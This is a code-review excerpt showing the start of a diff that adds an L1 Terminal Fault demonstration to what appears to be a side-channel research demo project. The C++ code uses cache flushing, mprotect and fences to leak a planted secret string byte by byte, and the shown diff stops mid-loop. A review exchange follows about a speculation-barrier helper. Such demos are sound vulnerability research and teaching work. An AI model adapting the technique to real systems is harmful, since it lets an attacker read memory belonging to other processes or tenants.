demos/l1tf.cc

```diff
@@ -0,0 +1,128 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef __linux__
+#  error Unsupported OS. Linux required.
+#endif
+
+#if !defined(__x86_64__) && !defined(__i386__)
+#  error Unsupported architecture. ARM64 required.
+#endif
+
+#include <array>
+#include <cstring>
+#include <fstream>
+#include <iostream>
+
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+const char *private_data = "It's a s3kr3t!!!";
+char *private_page = nullptr;
+
+extern char aftespeculation[];
+
+static char leak_byte(size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    for (int i = 0; i < 256; ++i) {
+      // Load the private_page into L1 cache.
+      ForceRead(private_page);
+
+      // Flip the "present" bit in the private_page table record.
+      mprotect(private_page, PAGE_SIZE, PROT_NONE);
+
+      // Block any speculation forward.
+      MFence();
+      LFence();
```

Comment:
This example only works on x86, so it could be reasonable to use the x86 intrinsics directly. We're already relying on the implementation detail that on x86 `mfence`/`lfence` is a full memory and speculation barrier.

Maybe better: expose a `MemoryAndSpeculationBarrier()` function from `instr.h` that implements the semantics we want here. It could even be `cpuid` to make sure *everything* is serialized.

Reply:
Done.